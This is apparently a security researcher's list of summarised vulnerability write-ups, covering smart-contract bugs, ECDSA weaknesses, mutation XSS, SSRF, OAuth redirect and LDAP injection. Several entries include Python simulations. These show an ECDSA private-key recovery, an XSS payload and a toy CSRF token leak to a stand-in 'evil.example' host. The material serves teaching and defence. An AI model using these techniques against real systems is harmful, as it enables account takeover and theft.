Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Socket Incident Report 16 Jan- 1325

SocketTech    Reference →Posted 2 Years Ago
  • Socket Tech provides interoperability across the major chains and bridges. On January 16th, they were exploited in a major way.
  • Socket Gateway hosts various modules that can only be added by administrators. When deploying a module, a developer first deploys it, then the admin attaches it to the contract.
  • The goal was to update the contract WrapperTokenSwappgerImpl. When doing this, the development team had a mix-up over which version should be deployed - pre-review vs post-review. For whatever reason, the pre-review module got deployed and attached to the contract.
  • The original code had an arbitrary call vulnerability where both the address being called and the data, such as the selector, could be set. As a result, an attacker called transferFrom() on all of the token contracts that had large approvals from users. This is a good example of why token approvals should NOT be infinite.
  • Overall, the bug is pretty simple. The interesting part to me is how it got released into the wild: the team had reviewed the code and found the bug but released the wrong version. I suppose a more rigorous CI/CD deployment process could have caught this.
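To make the bug class concrete, here is a minimal Python simulation (all names and mechanics are hypothetical, not Socket's actual code) of an arbitrary-call gateway draining a standing infinite approval:

```python
# Minimal sketch (hypothetical names) of the arbitrary-call pattern: a gateway
# that forwards a caller-chosen call can drain any token that users have
# granted it an approval on.

class Token:
    def __init__(self):
        self.balances = {}
        self.allowances = {}  # (owner, spender) -> amount

    def approve(self, owner, spender, amount):
        self.allowances[(owner, spender)] = amount

    def transfer_from(self, caller, owner, to, amount):
        # standard ERC20 semantics: the caller spends the owner's allowance
        assert self.allowances.get((owner, caller), 0) >= amount
        assert self.balances.get(owner, 0) >= amount
        self.allowances[(owner, caller)] -= amount
        self.balances[owner] -= amount
        self.balances[to] = self.balances.get(to, 0) + amount

class Gateway:
    """The buggy module: forwards an arbitrary call, acting as itself."""
    def execute(self, target, fn, args):
        getattr(target, fn)("gateway", *args)  # attacker picks target AND selector

usdc = Token()
usdc.balances["alice"] = 1_000
usdc.approve("alice", "gateway", 2**256 - 1)  # "infinite" approval to the gateway

# Attacker chooses the token contract, transferFrom, and the arguments freely.
Gateway().execute(usdc, "transfer_from", ("alice", "attacker", 1_000))
print(usdc.balances)  # alice drained
```

The drain works against every user with an open approval, which is why capped approvals limit the blast radius of a bug like this.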

ECDSA is Weird- 1324

Kelby Ludwig    Reference →Posted 2 Years Ago
  • ECDSA has many unexpected properties that can cause security issues if people are not completely sure how it works. I can imagine many of these issues being found in blockchain-land, since the public nature of all data gives everyone more access to signatures than anticipated.
  • The first, and most well-known, issue is signature malleability. The curves used here have the form y^2 = x^3 + Ax + B. Because of the y^2 term, the curve is symmetric about the x-axis, so every point has a mirror image. As a result, for any valid signature (r, s), the pair (r, n - s) is a second valid signature over the same message, and the math to compute it is trivial.
  • In blockchain, the usage of signatures is common. To prevent replay and double-spend attacks, schemes that use a signature as a unique key must pin down the orientation of s. Otherwise, anyone can flip the signature into its duplicate form and bypass the scheme.
  • Given a signature, it's trivial to generate a keypair that has the same signature for a chosen message. In our replay attack example, this doesn't do us any good. However, if there is a scheme that assumes signatures are unique and anybody can call it, then this can be a problem. Now, we have the ability to create arbitrary messages with the same signature. Super weird issue but interesting in practice.
  • The next one is not as common but pops up from time to time. It's super important to hash the provided data yourself and NOT trust an incoming hash. If the hash is trusted, an attacker can forge valid signatures for arbitrary public keys without knowing the private key. One of the examples is an app that tried to prove it created Bitcoin by spoofing the Satoshi address.
  • The final two have to do with knowledge of the random nonce k. Any knowledge of k makes it trivial to recover the private key. Additionally, if two signatures from a user share the same k, the private key can also be recovered with similar algebra.
  • All of the issues above have a POC in the code, which is super nice as well. Cryptography is absolute black magic and we all need to be careful when using it. The author also linked this as inspiration, which has lots more content about cryptography issues.
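The malleability and nonce-reuse claims are easy to sanity-check with a toy pure-Python ECDSA over secp256k1 (illustrative only - not constant-time, not for production use):

```python
# Toy ECDSA over secp256k1 to check two claims: (r, n - s) is a second valid
# signature, and a repeated nonce k leaks the private key. Key/nonce values
# are arbitrary toy constants.

p = 2**256 - 2**32 - 977  # field prime
n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141  # order
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

def add(P, Q):
    if P is None: return Q
    if Q is None: return P
    if P[0] == Q[0] and (P[1] + Q[1]) % p == 0: return None  # P + (-P)
    if P == Q:
        lam = 3 * P[0] * P[0] * pow(2 * P[1], -1, p)
    else:
        lam = (Q[1] - P[1]) * pow(Q[0] - P[0], -1, p)
    x = (lam * lam - P[0] - Q[0]) % p
    return (x, (lam * (P[0] - x) - P[1]) % p)

def mul(k, P):                          # double-and-add scalar multiplication
    R = None
    while k:
        if k & 1: R = add(R, P)
        P = add(P, P)
        k >>= 1
    return R

def sign(d, z, k):                      # z = message hash, k = nonce
    r = mul(k, G)[0] % n
    s = pow(k, -1, n) * (z + r * d) % n
    return r, s

def verify(Q, z, sig):
    r, s = sig
    u1, u2 = z * pow(s, -1, n) % n, r * pow(s, -1, n) % n
    return add(mul(u1, G), mul(u2, Q))[0] % n == r

d = 0xC0FFEE                            # private key (toy value)
Q = mul(d, G)                           # public key
z1, z2, k = 111, 222, 0xBAD5EED

# 1) malleability: flipping s to n - s still verifies
r, s = sign(d, z1, k)
assert verify(Q, z1, (r, s)) and verify(Q, z1, (r, n - s))

# 2) nonce reuse: two sigs sharing k reveal k, then d
s2 = sign(d, z2, k)[1]
k_rec = (z1 - z2) * pow(s - s2, -1, n) % n   # s1 - s2 = (z1 - z2)/k
d_rec = (s * k_rec - z1) * pow(r, -1, n) % n  # solve s = (z + r*d)/k for d
assert (k_rec, d_rec) == (k, d)
```

The nonce-reuse recovery is pure algebra on the signing equation, which is why "any knowledge of k" is fatal.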

Permission denied - The story of an EIP that sinned- 1323

Trust Security    Reference →Posted 2 Years Ago
  • EIP-2612 is an extension of the ERC20 standard that adds the Permit() function. This removes the burden of paying gas for a call to approve(): instead, a user signs a permit message offline and gives it to another party, who can submit it on-chain to gain the approval to transfer funds from the signer's account. Good idea that saves lots of gas!
  • There are two key items to verify: the signature is valid and the deadline has not passed. Crucially, the msg.sender of the call does NOT need to be validated. This is a known limitation but was brushed off as "The end result is the same for the Permit signer..." The authors of this post asked themselves whether that is actually true.
  • Many times, the call to Permit() sits in the middle of lots of other code. So, if an attacker frontruns the outer call, extracts the signature and uses it directly in a call to Permit(), the victim's transaction reverts and they lose the ability to use the functionality from that point. The authors went around and started looking for cases where this holds.
  • The case they saw over and over again was custom functions built around the EIP-712 permit, mostly deposit() functions. With these, there's a permit, a transfer, then some custom logic; in the example, the logic called _creditUser(). Since an attacker can frontrun this call, the final step never happens, losing the user some value.
  • The author has a very good point on this: "The issue is a great example of how important it is to be security-focused when defining widely used standards." When creating standards for everyone to use, they had better be well thought out. The payouts for the reports were mixed: some paid, some were supposed to via Immunefi and didn't... Just how the life of a bug bounty hunter goes.
  • They claim this falls under the griefing category, a medium severity: a bug that can hurt an individual user or protocol for a short period of time but offers no profit to the attacker. To me, this doesn't fall under griefing, since the user permanently loses access to the functionality. Overall, a good write-up on an issue that appears to be everywhere. I'm curious to see if this will turn into the next ERC20-approval-frontrun bug in terms of reporting.
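A minimal simulation of the griefing (hypothetical names, Python standing in for Solidity): the attacker replays the extracted signature first, burning the nonce so the victim's deposit() reverts before _creditUser() ever runs:

```python
# Sketch of the permit-frontrun griefing. The attacker lifts the signature
# from the victim's pending deposit() transaction and submits it to permit()
# directly; the victim's own transaction then reverts on the consumed nonce.

class PermitToken:
    def __init__(self):
        self.nonces = {}

    def permit(self, owner, spender, amount, sig):
        # simplified: a signature is only valid for the owner's current nonce
        expected = ("signed", owner, spender, amount, self.nonces.get(owner, 0))
        assert sig == expected, "invalid permit signature"
        self.nonces[owner] = self.nonces.get(owner, 0) + 1
        # ... allowance would be set here ...

class Vault:
    def __init__(self, token):
        self.token = token
        self.credited = {}

    def deposit(self, user, amount, sig):
        self.token.permit(user, "vault", amount, sig)  # reverts if nonce burned
        # ... transferFrom would happen here ...
        self.credited[user] = self.credited.get(user, 0) + amount  # _creditUser()

token = PermitToken()
vault = Vault(token)
sig = ("signed", "alice", "vault", 100, 0)   # alice's offline signature

# attacker frontruns the deposit with the same signature, burning the nonce
token.permit("alice", "vault", 100, sig)

try:
    vault.deposit("alice", 100, sig)          # victim's transaction now reverts
except AssertionError:
    print("deposit reverted: alice is never credited")
```

A common mitigation is wrapping the permit call in a try/catch and proceeding if the allowance already exists, so a frontrun cannot block the deposit.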

Code Vulnerabilities Put Proton Mails at Risk- 1322

Paul Gerste - Sonar Source    Reference →Posted 2 Years Ago
  • Proton Mail is a privacy-centric email service, so being able to extract secrets from it would be devastating. Under the hood, it uses the state-of-the-art HTML sanitizer DOMPurify to avoid XSS from incoming emails.
  • After the sanitization via DOMPurify, the author noticed that some DOM manipulation was being done. In particular, the code would find <svg> elements and replace them with <proton-svg>. It may be possible to use this to break the parsing of the HTML!
  • HTML has its own parsing rules, but SVG and MathML content follow different ones. The <style> tag is the interesting case: in HTML, everything up to the next closing style tag is raw text; in SVG, a <style> element can contain child elements. The same markup seen in different contexts can mean very different things.
  • When the element is changed from svg to proton-svg, the parsing context changes dramatically. Using the payload <style><a alt="</style><img..."> and switching the context causes the style contents to get parsed differently. Originally, the text was inert inside the svg, since it was valid there. But the transformation changes the context, potentially leading to XSS.
  • Adding an onerror="javascript..." attribute to the smuggled <img> now leads to XSS! But we still have two more lines of defense: an iframe sandbox and a CSP. For the iFrame on Safari, the sandbox includes the allow-scripts directive, which allows attackers to execute JS inside the frame.
  • The allow-popups-to-escape-sandbox directive allows a popup opened from the iFrame to run without the sandbox restrictions. For other browsers, the attacker needs a victim to click on a link that opens in a new tab, which can then access the rest of the content on the website.
  • The final step is bypassing the CSP, which restricts the origins that content can be loaded from. In this CSP, the blob: URI scheme was allowed for scripts. Blob URLs are temporary URLs that can be created dynamically and then loaded. If we can convince the browser to load our blob, we can execute arbitrary JS.
  • Blob URLs are placed at long random UUIDs, so we need a way to learn where they are. To do this, the author used the ability to render remote images and inline styles to leak the blob URL, then used that URL in a later payload.
  • Overall, an awesome post on contexts for HTML parsers, escaping iFrame sandboxes and CSP bypasses. I really enjoyed the post and learned a ton along the way.
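The ordering pitfall can be sketched in a few lines (the sanitizer here is a stand-in, not DOMPurify, and the payload is the one from the post; the point is that mutating markup after sanitization voids the sanitizer's guarantee):

```python
# Sketch of the anti-pattern: markup is mutated *after* the sanitizer has run,
# so the sanitizer's promise ("this output is safe as-is") no longer applies.

PAYLOAD = '<svg><style><a alt="</style><img src=x onerror=alert(1)>"></a></style></svg>'

def sanitize(html):
    # stand-in for DOMPurify: in the SVG context the alt="..." text is inert,
    # so a real sanitizer reasonably leaves this markup alone
    return html

def proton_transform(html):
    # the post-sanitization processing: rename svg elements
    return html.replace("<svg", "<proton-svg").replace("</svg>", "</proton-svg>")

rendered = proton_transform(sanitize(PAYLOAD))
# <proton-svg> is not an SVG root, so the browser now parses <style> under
# HTML raw-text rules: the element closes at the '</style>' hidden inside the
# attribute value, and the <img onerror=...> becomes live markup.
print(rendered)
```

The safe orderings are: transform first and sanitize last, or re-sanitize after any post-processing.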

draw.io CVEs- 1321

lude.rs    Reference →Posted 2 Years Ago
  • Draw.io is a website for drawing diagrams. The first vulnerability is a simple SSRF bug because of a bad and manual blacklisting technique. The second issue is much cooler though.
  • The website supports OAuth from third-party providers like GitHub. If we can force a redirect during this flow, we can steal the OAuth token, which would be awesome. However, absolute URLs are not allowed for the redirect - only relative ones. Regardless, the author decided to take a look to see if this could be bypassed.
  • The verification code checks whether the URL is absolute. The library doing this follows the specification perfectly: if the URL is invalid, the code assumes it's a relative path! So, what if we found a URL that is invalid per the spec but is processed as an absolute URL by the browser?
  • The author did some fuzzing and manual testing. Chrome, ever nice, does not conform to the RFC: if there is a space after the protocol, it will just remove the space. To a spec-conforming parser, though, this is an invalid URL, which triggers our error path. An example is https:// @evil.com/, with the space being the important thing here.
  • Since the check is bypassed for an absolute URL, the redirect will be made to an attacker-controlled website. This steals the OAuth code, leading to a compromise of the user's account. Overall, amazing post. I love the idea of "what if we have a URL that's invalid by the RFC but valid to Chrome?" Even though the issue was not immediately exploitable at first glance, the bad error handling pointed the way.
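A sketch of the vulnerable logic (the validator is hypothetical, modeled on the post's description): a spec-strict parser treats the invalid URL as relative and allows it, while Chrome strips the space and ends up with an absolute one:

```python
# Sketch of the check: anything that fails strict absolute-URL parsing is
# assumed to be a safe relative path. The regex is a simplified stand-in for
# an RFC-conformant parser, not the real library.
import re

def strict_parse_is_absolute(url):
    # scheme "://" authority; spaces make the URL invalid per the RFC
    return re.fullmatch(r"[A-Za-z][A-Za-z0-9+.\-]*://[^\s/]\S*", url) is not None

def redirect_allowed(url):
    # vulnerable logic: invalid-or-relative -> allowed
    return not strict_parse_is_absolute(url)

evil = "https:// @evil.com/"              # note the space after the protocol
assert redirect_allowed(evil)             # passes the check as "relative"

chrome_view = evil.replace(" ", "")       # Chrome strips the whitespace...
assert not redirect_allowed(chrome_view)  # ...yielding an absolute URL after all
```

So the server-side check and the browser disagree about the same string, which is the whole bug.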

Code Vulnerabilities Put Skiff Emails at Risk- 1320

Paul Gerste - Sonar Source    Reference →Posted 2 Years Ago
  • Skiff is an email provider that really doesn't want XSS on their website. First, they sanitize their emails using DOMPurify. After that, they do various transformations on the data, which is the crux of the issue. They stick the email rendering into an iFrame and have a good CSP as well. Let's bypass all of them!
  • Mutation XSS (mXSS) is a type of XSS that arises when the browser "fixes" malformed markup during re-parsing, changing its expected meaning. A good example of this can be seen here.
  • In Skiff, the content is run through DOMPurify and then processed some more. During this processing, previously quoted emails are put into a thread, which inserts an empty div with the attribute data-injected-id=last-email-quote before the first element. So, what's the big deal with this small change?
  • In HTML, a div is invalid within an svg tag, so if the browser sees this it will move the entire div element outside of the svg. Many elements that are safe inside the svg are unsafe in the normal HTML context. Using some weirdness with style tags closing within double quotes in the HTML context but not the SVG context allows for the smuggling of an image tag with an onerror event! This gives us XSS within the iFrame.
  • The iFrame for Skiff has three sandbox directives on it: allow-same-origin, allow-popups and allow-popups-to-escape-sandbox. The goal is to get code that we can execute on the page. To do this, they first noticed that images are rendered as inline blobs. Since blobs inherit the origin they are created on, we can create an attachment with the necessary payload in a blob. The blobs have a random UUID though. So, using a technique from a previous post, they use CSS to leak the UUID to themselves.
  • Once they know the UUID of the attachment, they put it into a link for the victim to click in a follow-up email. Because the link contains target="_blank", it opens in another tab whose content is controlled by us.
  • The final thing was bypassing the CSP, which contains script-src 'unsafe-eval' http://hcaptcha.com. hCaptcha is known to host an XSS gadget, so an attacker can simply use one of its existing functions to get the XSS working.
  • Overall, a pretty crazy XSS bug with a full CSP bypass and sandbox escape. To me, CSPs and iFrames seem inescapable, so finding posts that circumvent these protections is pretty amazing.

SSRF Cross Protocol Redirect Bypass- 1319

Szymon Drosdzol - doyensec    Reference →Posted 2 Years Ago
  • Server-side request forgery (SSRF) is a popular and impactful vulnerability class. To prevent it, URLs are processed to ensure that no internal addresses are reached. The title of this post says it all: switching protocols to bypass protections.
  • One common bypass is pointing the request at a public domain that then redirects to an internal IP. The authors of this post had found this multiple times and recommended the anti-SSRF library ssrfFilter, which appeared to solve the problem.
  • When messing around with the library, an HTTP-to-HTTP redirect to localhost was blocked. However, redirecting from HTTPS to HTTP (or vice versa) to localhost wasn't.
  • What happened? Within the request library, whenever the protocol changes, the request agent is deleted to ensure the right client is used. However, the SSRF prevention is hooked on the agent's createConnection handler! So the mitigation never runs, since the hook is gone along with the agent.
  • Overall, a fairly crazy/weird bypass of the protections for SSRF issues. Sometimes, dynamic blackbox testing with weird inputs is more fruitful than reading the code. There's no way anybody would have found this by just reading the code as a security researcher.
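A small simulation of the bypass (hypothetical classes, not the real request/ssrfFilter code): the filter lives on the agent's connection hook, and a cross-protocol redirect silently swaps in an unfiltered agent:

```python
# Simulation of the agent-drop bug. A toy DNS table keeps the example offline.
import ipaddress

DNS = {"public.example": "93.184.216.34", "localhost": "127.0.0.1"}

class FilteringAgent:
    """Stand-in for the anti-SSRF agent: its connection hook blocks internal IPs."""
    protocol = "http"
    def create_connection(self, host):
        ip = ipaddress.ip_address(DNS[host])
        if ip.is_loopback or ip.is_private:
            raise ValueError("SSRF blocked: " + host)
        return "conn:" + host

class DefaultAgent:
    """Plain agent with no filtering, used after the original is deleted."""
    protocol = None
    def create_connection(self, host):
        return "conn:" + host

# attacker-controlled redirect: public HTTP page -> HTTPS on localhost
REDIRECTS = {"http://public.example": "https://localhost"}

def fetch(url, agent):
    scheme, host = url.split("://", 1)
    if agent.protocol not in (None, scheme):
        agent = DefaultAgent()   # BUG: cross-protocol hop drops the agent (and the filter)
    conn = agent.create_connection(host)
    if url in REDIRECTS:
        return fetch(REDIRECTS[url], agent)
    return conn

print(fetch("http://public.example", FilteringAgent()))  # reaches localhost
```

A direct request to localhost is still blocked; only the protocol-switching redirect slips through, matching the behavior described in the post.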

CVE-2022-4908: SOP bypass in Chrome using Navigation API- 1318

Johan Carlsson    Reference →Posted 2 Years Ago
  • The Navigation API is intended to replace the old History API and solve the problems of SPA client-side navigations. The navigation.entries() function returns a list of the history for a given window's session. Ideally, this will only return history entries for pages that have the same origin as the current page. Each history entry contains the full URL including fragments, making it ripe for attack.
  • When reading the specification, the author noticed that the API allows for the interception of navigation events. Immediately, the author thought of this as a good candidate for abuse: it could be violating SOP, redirecting navigations and more.
  • The author tried some things but then found a post by Gareth Heyes with a tool. Using some ideas from it, they set up an iFrame, installed a hijacker for the navigation API on the iFrame, then redirected it to about:blank. Upon doing this, the history array was returned!
  • The history entries were returned for items that were same-site instead of same-origin. Still, getting XSS or a subdomain takeover and then using this could leak information cross-origin, which is pretty bad. For OAuth, which commonly has secrets in the URL, this would be a complete account takeover if somebody visited the website.
  • They decided to test this with an imaginary XSS on the GitLab forums against the real GitLab. By having XSS (again, not a real one) on the forums, the OAuth codes could be exfiltrated from the history information of the Navigation API. They also learned the difference between an eTLD and a TLD for same-site, which is not talked about as much as it should be.
  • To really drive home the point, they wanted to find something real and worse to exploit. codesandbox.io hosts code that can be executed by others on subdomains. If a user was logged in to the site via an SSO provider like GitHub or Google, an attacker could access the OAuth codes from the history information! Damn, that's real bad. It should be noted that a window reference is all that is needed, either through opening a tab or an iFrame.
  • The ticket has some insight into what happened. When copying information for the entries during the about:blank navigation, the developer did not consider that a cross-origin request could be made. Luckily, site isolation (which isolates processes for different sites) prevented even worse cross-origin leaks.
  • Overall, a super interesting vulnerability that actually has some real impact. Following your gut for features that look dangerous works out a lot of the time!

RCE via LDAP truncation on hg.mozilla.org- 1317

joernchen     Reference →Posted 2 Years Ago
  • The author got access to some of Mozilla's infrastructure code from a friend. Mozilla runs its own SCM (Mercurial, on hg.mozilla.org) for version control, which is where the bug is at.
  • pash appears to be a small shell that was used for handling SCM operations for hg.mozilla.org. One function allows users to clone private repos of a given user.
  • The user controls some input being read via SSH. In particular, the username is completely user-controlled. When checking whether the user exists via LDAP, the author thought they had LDAP injection at first. However, the characters necessary for it were being filtered out. So, what can we do?
  • The filtration can be bypassed by injecting null bytes: the null byte stops the string processing within the filtering calls. Note that the null byte is encoded and escaped per LDAP syntax, yet when used in the LDAP query it's interpreted as normal. What does this mean?
  • The filtering of the bad characters in the LDAP query can be bypassed to get LDAP injection. With it, we can trick the query into returning true for our user while carrying other malicious data. In particular, command injection was possible in the rest of the script, which assumed that no valid user could contain malicious characters.
  • To me, the filtering on the command should have been done regardless - you can't rely on usernames being benign, as issues like this one show. I asked the author how they thought of this issue: they were reading LDAP specifications, saw that you can encode arbitrary bytes, then just tried it in their local environment. The takeaway is trying lots of things and observing the results in a good test environment.
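The truncation trick can be sketched like this (illustrative names, not the real pash code): a C-style scan stops at the first NUL, so everything after it reaches the LDAP filter unchecked:

```python
# Sketch of the bug class: the filter only inspects the bytes before the
# first NUL, but the full buffer flows into the LDAP query.

def vet_username(name: str) -> str:
    # mimics C string handling: scanning stops at the NUL terminator
    checked = name.split("\x00")[0]
    if any(c in "()*|&=" for c in checked):
        raise ValueError("bad character in username")
    return name                      # BUG: the FULL buffer is returned

def build_filter(name: str) -> str:
    return f"(uid={name})"

# metacharacters before the NUL are caught...
try:
    vet_username("evil)(uid=*")
except ValueError:
    print("plain injection blocked")

# ...but hiding them behind a NUL byte sails through
smuggled = vet_username("someuser\x00)(uid=*")
query = build_filter(smuggled)       # injected clause survives after the NUL
```

The fix is to validate and escape the entire byte string (or reject NULs outright) rather than trusting whatever a string scan happens to see.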

What is HTML Over the Wire? A brief history of web app tech.- 1316

bountyplz    Reference →Posted 2 Years Ago
  • Back in the day, websites were truly static, with only HTML and CSS being returned. Over time, dynamic pages became the norm, with AJAX/XHR requests made in the background to fetch data for the page. The Single Page Application (SPA), extremely common nowadays, uses this pattern.
  • SPAs are snappy and react quickly. However, collecting data from the server still takes time, on top of all the parsing to be done, and the frameworks are quite heavy as well. So, something new has gained popularity: HTML Over the Wire (FROW).
  • FROW is an architecture that attempts to combine the pre-rendering of HTML with the quickness of SPAs. It renders the HTML for the initial page on the backend but retains the ability to alter dynamic portions of the page in SPA-style fashion. Hotwire Turbo, Unpoly, HTMX and many other libraries take this approach.
  • Clicking links is kind of weird with this architecture. Should it reload the page like an old webpage or act like an SPA? Most of the libraries fire off a fetch() in the background and then update the UI without reloading the page, overriding the default behavior of just making a GET request.
  • To support this, the FROW libraries add custom HTML attributes that allow changing the fetch() request being made - for instance, the method, the headers and more. The functionality is only intercepted from the browser if the origin of the path matches an internal meta tag.
  • To top it off, most of these FROW libraries automatically add CSRF tokens into a header of the request. So, here's the idea: can we trick the application into sending a user's CSRF token by poisoning the allowed domains?
  • On Turbo Drive, the turbo-root can be set in a meta tag. According to the author, they've seen cases where an attacker can control this location. Since the application thinks the link is trusted, it will send the CSRF token along with it.
  • On HTMX, the same thing can happen: if the link of the request can be set and the CSRF token is configured to go in the body, it will be sent blindly. Overall, an interesting post on the integration of technologies causing weird issues. I'm not sure how exploitable this really is, since many things have to come together.
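The root-poisoning idea can be sketched as follows (a simplified, hypothetical model - real Turbo/HTMX behavior is more involved, and the header name here is illustrative):

```python
# Sketch of the trust check: the library attaches the CSRF token to any link
# that falls under the configured app root, so an attacker who can poison
# that meta tag receives the token on a cross-origin request.

def should_attach_csrf(link: str, app_root: str) -> bool:
    # Turbo-style check: requests "inside the app" get the token header
    return link.startswith(app_root)

def build_fetch(link: str, app_root: str, csrf_token: str) -> dict:
    headers = {}
    if should_attach_csrf(link, app_root):
        headers["X-CSRF-Token"] = csrf_token
    return {"url": link, "headers": headers}

# normal case: same-app link, token attached as intended
req = build_fetch("https://app.example/posts", "https://app.example", "s3cr3t")
assert "X-CSRF-Token" in req["headers"]

# poisoned meta tag: the attacker's origin is now "trusted"
leak = build_fetch("https://evil.example/steal", "https://evil.example", "s3cr3t")
assert leak["headers"]["X-CSRF-Token"] == "s3cr3t"
```

Which is why the exploit hinges entirely on being able to inject or influence that meta tag in the first place.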